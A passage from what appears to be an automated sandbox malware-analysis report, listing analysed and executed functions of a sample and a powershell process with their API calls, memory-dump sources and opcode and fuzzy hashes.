                                                • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3125694417
                                                • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                Executed Functions

                                                Function 04C97801 Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5abd2d125a296db5f6408b5a33116e93d04c18bab954975089d3a63cf6514504
                                                • Instruction ID: 2a7ccdd23ba523800b0239084c529cd957bd2da171f82318900bf066642a2519
                                                • Opcode Fuzzy Hash: 5abd2d125a296db5f6408b5a33116e93d04c18bab954975089d3a63cf6514504
                                                • Instruction Fuzzy Hash: 96414C35602215DFDB19EB74C998AAA7BF7EF89350F085469D402EB7A0DF30AD41CB90
                                                Function 07B2701C Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: E
                                                • API String ID: 0-3568589458
                                                • Opcode ID: 5131224f5348c4c3fff0d94211b14c7192672704824c4134032555d1ed703b89
                                                • Instruction ID: 656252306c002e26456dea93992c11cf19d3f08d827ef534218e6d966018ed71
                                                • Opcode Fuzzy Hash: 5131224f5348c4c3fff0d94211b14c7192672704824c4134032555d1ed703b89
                                                • Instruction Fuzzy Hash: D2227CB4A002159FE710DB54C851FAAB7B2EB85318F54C0D8E909AF795CB72ED828F91
                                                Function 07B2EE08 Relevance: .7, Instructions: 694COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b2e054c653296e209dc797c7fc36097acd7a168c9b277f1e96e999a411e0b1
                                                • Instruction ID: 74f2fa16fd84f4579f7a410f464af387806864bc42e87c69da6f546cb0eca47c
                                                • Opcode Fuzzy Hash: 98b2e054c653296e209dc797c7fc36097acd7a168c9b277f1e96e999a411e0b1
                                                • Instruction Fuzzy Hash: 2142D3F1B05255DFEB14CFA8C454ABABBB2EF86310F1481AAD4199B354CB31D843DBA1
                                                Function 07B26F0A Relevance: .6, Instructions: 646COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b848ce6f3ba046895c2545c3af69aabe242da7132248361654509aa73453239
                                                • Instruction ID: 0db4c15a97c82afefe618759905ccbbc9291969402c811640b2ba58a60812ded
                                                • Opcode Fuzzy Hash: 0b848ce6f3ba046895c2545c3af69aabe242da7132248361654509aa73453239
                                                • Instruction Fuzzy Hash: 30527BB4B002159FEB10DB58C851BAAB7B2EB85314F14C0D9E90DAF755CB72ED828F91
                                                Function 07B2C11B Relevance: .6, Instructions: 621COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07c01ccfcfaa5acd9816c1f52b0d0928268def7a1d2ffa1bbe3a2df9a1120bb7
                                                • Instruction ID: 3f8d9365ad647660eb2492d222f9fe391179cc390ae7aa91affe18a5a60c5300
                                                • Opcode Fuzzy Hash: 07c01ccfcfaa5acd9816c1f52b0d0928268def7a1d2ffa1bbe3a2df9a1120bb7
                                                • Instruction Fuzzy Hash: E1423FB4B003149FD714DB58C851BAEBBF2EB8A744F118199E9099F351CB72ED828F91
                                                Function 07B26644 Relevance: .6, Instructions: 589COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2c63a1c3ab9697b6dc7e7a57931d13141509bc034d936f6d39bc32d1b305441
                                                • Instruction ID: a2e83c264c57fa96f95e81feecffcbfd7f469141316e3d0ad6d6f6ff8163ad63
                                                • Opcode Fuzzy Hash: a2c63a1c3ab9697b6dc7e7a57931d13141509bc034d936f6d39bc32d1b305441
                                                • Instruction Fuzzy Hash: C4328EB4B002159FEB14DB54C851BAEBBB2EF85314F14C099E909AF755CB32ED828F91
                                                Function 07B272B8 Relevance: .5, Instructions: 544COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30055ef7a435cb9c199cd248d759d4cb551baeec89b77550d4256c6e679a1746
                                                • Instruction ID: 4e944f92021b0a63ed9cc6646be03b6974e2c7639a32c27ed9b6f137ccdaf649
                                                • Opcode Fuzzy Hash: 30055ef7a435cb9c199cd248d759d4cb551baeec89b77550d4256c6e679a1746
                                                • Instruction Fuzzy Hash: 0B227CB4B01214AFEB04CB98C455FAEBBF2EF85314F158099EA099F351CB72ED428B55
                                                Function 09861C88 Relevance: .5, Instructions: 508COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116376312.0000000009860000.00000040.00000800.00020000.00000000.sdmp, Offset: 09860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9860000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98664567d6a5ec7e1afc1ac4e17b77a56f66c8673ce664c72b3efc62f2af40c3
                                                • Instruction ID: 26621ef656b3d16ec3a8f8390fea015c1490b9d005cc2e3a313e7e900e3919d7
                                                • Opcode Fuzzy Hash: 98664567d6a5ec7e1afc1ac4e17b77a56f66c8673ce664c72b3efc62f2af40c3
                                                • Instruction Fuzzy Hash: 34022631B08249DFDB258FA9C41466ABBF2AF95310F1480AEE555CF362DB31D841CBA2
                                                Function 07B2B928 Relevance: .5, Instructions: 503COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5aa782dbd0328dd61b93a8b39a25a82a1382687a0cfcfaa796f63579a618aada
                                                • Instruction ID: f47f0f0b8d6afa7d331160f656e69caea1214816850159700aabe4a32c6155de
                                                • Opcode Fuzzy Hash: 5aa782dbd0328dd61b93a8b39a25a82a1382687a0cfcfaa796f63579a618aada
                                                • Instruction Fuzzy Hash: 0F2262B4B003149FD714DB58C851BAEBBF2EB86744F508199E909AF351CB72ED828F91
                                                Function 07B2C204 Relevance: .5, Instructions: 467COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36b6f87c63695a94af9bb4ca43ad1c4c245df0092070e7dda81090425f087587
                                                • Instruction ID: 1355df4c805a1d24bc185d332c2b61f5589dbeb1707a3e701bcf2c6dcfe84d9b
                                                • Opcode Fuzzy Hash: 36b6f87c63695a94af9bb4ca43ad1c4c245df0092070e7dda81090425f087587
                                                • Instruction Fuzzy Hash: 2A1251B4B003149FD714DB54C851BAEBBF2EB86744F508199E909AF381CB72ED828F91
                                                Function 09851120 Relevance: .4, Instructions: 439COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01af6c711e28bd3113de444a1c7a5439119176580a3d7454bd3437a5fa71ea3b
                                                • Instruction ID: ed6b78d5c38c8c5abcb6c6abfb5163224a1374230d5173d17c40319a505b172c
                                                • Opcode Fuzzy Hash: 01af6c711e28bd3113de444a1c7a5439119176580a3d7454bd3437a5fa71ea3b
                                                • Instruction Fuzzy Hash: 14022974A04209DFCB05CFA8D884AADBBB2FF89314F248159E905EB365C731ED85CB90
                                                Function 098520C0 Relevance: .4, Instructions: 423COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95f02a8b70a7bb2f9f2fa555d7b1cf871508283d70e6168b264d3821e56691f6
                                                • Instruction ID: 56125c8d4cd046dc941f42e95c67914006d8a2c49d3441368e58865d1b4e5f83
                                                • Opcode Fuzzy Hash: 95f02a8b70a7bb2f9f2fa555d7b1cf871508283d70e6168b264d3821e56691f6
                                                • Instruction Fuzzy Hash: 57021D74A00209DFDB15CF98D894A9DBBB2FF89320F248159E915EB365CB31ED85CB90
                                                Function 098516E8 Relevance: .4, Instructions: 418COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90a780aaeba30850cd43d11e8a326ed8e272e0f3e5c0447e21a97ba461a8dee5
                                                • Instruction ID: bec7d605db90e5334ecc95879b1fbbfa86a81b465dbb8e735e5636810a9cc20f
                                                • Opcode Fuzzy Hash: 90a780aaeba30850cd43d11e8a326ed8e272e0f3e5c0447e21a97ba461a8dee5
                                                • Instruction Fuzzy Hash: D4023A34A04249DFDB15CFA8C494AAEBBB2FF89310F248159E845EB365D735EC85CB90
                                                Function 07B27296 Relevance: .4, Instructions: 394COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d6e33291cd3b87024153fbcf51743fe611fd63de64665b61040c8cc8af1d2fd
                                                • Instruction ID: 44fdf1f8dd6d50750c394bfb259ed3d7e7ff82de6f253fbd31a7bf21c253b443
                                                • Opcode Fuzzy Hash: 1d6e33291cd3b87024153fbcf51743fe611fd63de64665b61040c8cc8af1d2fd
                                                • Instruction Fuzzy Hash: 69F17CB4B01214AFEB00CB98C455EADBBF2EF89314F158099E9099F352CB72ED42CB55
                                                Function 07B24548 Relevance: .4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 548b525d47dcb4b12233a5fbc26ea62d7b9ac62caa439c8208f1b330c95c681b
                                                • Instruction ID: 8009f1542315cb622dcae61a858f95e9480e099de95e2a5fe8d0005a0c3a6889
                                                • Opcode Fuzzy Hash: 548b525d47dcb4b12233a5fbc26ea62d7b9ac62caa439c8208f1b330c95c681b
                                                • Instruction Fuzzy Hash: 84E18EB0B012559FE714CB98C444F6ABBF2EF89314F15C0A9E9199F751CB72EC428B91
                                                Function 07B2FB20 Relevance: .4, Instructions: 376COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21a91b80a76c7d6b8f1bfd09d1864e1b924bed8a8851753000fdac856040571b
                                                • Instruction ID: c2acf5252c9e405dd9326de31e434acd1b72cd38c8e1f575c5bf1b2a9f55bf78
                                                • Opcode Fuzzy Hash: 21a91b80a76c7d6b8f1bfd09d1864e1b924bed8a8851753000fdac856040571b
                                                • Instruction Fuzzy Hash: B0E1B2F5B01215DFEB14CB58C454ABAB7F2EF8A314F1480AAE9499B356CB31DC42CB61
                                                Function 07B27B60 Relevance: .4, Instructions: 373COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 563ce4f2ab6fab03a98a33386d639254e9776b7243fffa214a32f10e9b550be6
                                                • Instruction ID: e778129edbfcd9ec10bfc33543c74f0358e56369081d0e4bfe941724b6f03f0c
                                                • Opcode Fuzzy Hash: 563ce4f2ab6fab03a98a33386d639254e9776b7243fffa214a32f10e9b550be6
                                                • Instruction Fuzzy Hash: 0AE19EB4B002159BEB14DFA8C450BAEBBF2EB89314F148469D6196F755CB32EC42CB91
                                                Function 07B2452D Relevance: .3, Instructions: 340COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3899c472ccb4ec164219861122dd209914f4860c2be79774fe157fb70eeb90ee
                                                • Instruction ID: b5f7a9db38dabfd76d89a30c0b0bf96ceffb748f31155713fff9e9a677db50bf
                                                • Opcode Fuzzy Hash: 3899c472ccb4ec164219861122dd209914f4860c2be79774fe157fb70eeb90ee
                                                • Instruction Fuzzy Hash: 21E17DF4B022559FEB10CF98C444EAABBF2EF85314F15C199E8199B751CB72EC429B50
                                                Function 07B2C654 Relevance: .3, Instructions: 333COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dd15232b70cc9312a67aa0a746444d153cc65a6c0e9579c9e0f17127d0cfde9
                                                • Instruction ID: b7287d71c61b94dda7bbc8a7a90a11d693d96c89585d00f9069afb413e95baf8
                                                • Opcode Fuzzy Hash: 0dd15232b70cc9312a67aa0a746444d153cc65a6c0e9579c9e0f17127d0cfde9
                                                • Instruction Fuzzy Hash: 40E141B4A01329DFEB24DB54C855BAEBBB2EB46304F1081D9D54D6B741CB329D82CF61
                                                Function 07B2F730 Relevance: .3, Instructions: 314COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2cd1010b26c9075a988d3cc34471b7c8c78379e2ab21e7c44c118a0a2e2e922f
                                                • Instruction ID: 1b08589cca6586873e4c757a9122b4a57899911ac61fdacff01013b836388314
                                                • Opcode Fuzzy Hash: 2cd1010b26c9075a988d3cc34471b7c8c78379e2ab21e7c44c118a0a2e2e922f
                                                • Instruction Fuzzy Hash: 14A137F1B06226DFEB248B64C4146BAB7B2EB86210F1480EBD45D9F251DB35C943DB91
                                                Function 07B27B45 Relevance: .3, Instructions: 314COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95fb2a7283c113fc6f77e72d040c1f98f08e009b97402ee3e3ed3f6763146b01
                                                • Instruction ID: be81e9e6d5aaefbddc36a3a18003f6c2d34b93c8dc4aec3a40a195fa049f2647
                                                • Opcode Fuzzy Hash: 95fb2a7283c113fc6f77e72d040c1f98f08e009b97402ee3e3ed3f6763146b01
                                                • Instruction Fuzzy Hash: B6C1CFB4A01215DFEB14CFA4C450BAEBBB2EF89314F148099E6196F355CB32EC42CB95
                                                Function 04C972A8 Relevance: .3, Instructions: 313COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f06374a4f0678540cd77d00f2b13655693b9cfe11e621d51585b3e262826986
                                                • Instruction ID: a4e3a564093316351c9901028301017ff68b3e569f69a9013ab7383d775c1def
                                                • Opcode Fuzzy Hash: 4f06374a4f0678540cd77d00f2b13655693b9cfe11e621d51585b3e262826986
                                                • Instruction Fuzzy Hash: 62C19C35A12248EFCB14DFA4C888AADBBF6FF84310F158559E4069B364CB34ED49CB80
                                                Function 04C92AA0 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8369d03d467b5c9171d339b674286d108cf00a089c6ad895c45f101b90256936
                                                • Instruction ID: b7ece8bc32a27da00eff13eb5b5568210acd99fc8e29c77964d28c78d5d9deca
                                                • Opcode Fuzzy Hash: 8369d03d467b5c9171d339b674286d108cf00a089c6ad895c45f101b90256936
                                                • Instruction Fuzzy Hash: B991A074A04245EFCB15CF58C494AAAFBF2FF49310B248AA9D8459B365C735FD41CB90
                                                Function 09850448 Relevance: .2, Instructions: 217COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec628fe8305774df21cd564f7fc3908471e416a9eb91223d1aedd02a87464293
                                                • Instruction ID: 4d5536f06ac7a945c0551b654c09ba4b9ffa25e7c1e81e487ab99856f72ed626
                                                • Opcode Fuzzy Hash: ec628fe8305774df21cd564f7fc3908471e416a9eb91223d1aedd02a87464293
                                                • Instruction Fuzzy Hash: 72818034B002098FDB15DFA9D850AAEB7F6FF88310F148569D90ADB355DB34AC46CBA1
                                                Function 07B2FC8C Relevance: .2, Instructions: 211COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2efc8e52c9aa6e6e8e5933ceae7b56e023e7f4324a3e972d9ef44337db225bce
                                                • Instruction ID: 9e25cb8d8558d37600199b4f94c060710a4404e1631d775aaf74f38ac0d8c61d
                                                • Opcode Fuzzy Hash: 2efc8e52c9aa6e6e8e5933ceae7b56e023e7f4324a3e972d9ef44337db225bce
                                                • Instruction Fuzzy Hash: 8E815CB4A01215DFEB14CF58C485ABAB7F2EF89314F158199E809AB355C732EC82CF61
                                                Function 04C97A70 Relevance: .2, Instructions: 193COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd3c8b86267f23147df457b35eff576dbe43db88a072d0ae5b7b658dee2ee932
                                                • Instruction ID: 65d13ff8aaa2e0674aae9ea60370bdc40a606ae096a7cc65501993efaddf6013
                                                • Opcode Fuzzy Hash: fd3c8b86267f23147df457b35eff576dbe43db88a072d0ae5b7b658dee2ee932
                                                • Instruction Fuzzy Hash: 6771AE30A02209DFDB24DF68D894A9DFBF6FF89314F14896AD409DB651DB31AD46CB80
                                                Function 04C97BDE Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d6869a55a527177f71c1477d65727e0201003755542984e62ac9aeb7c738a48
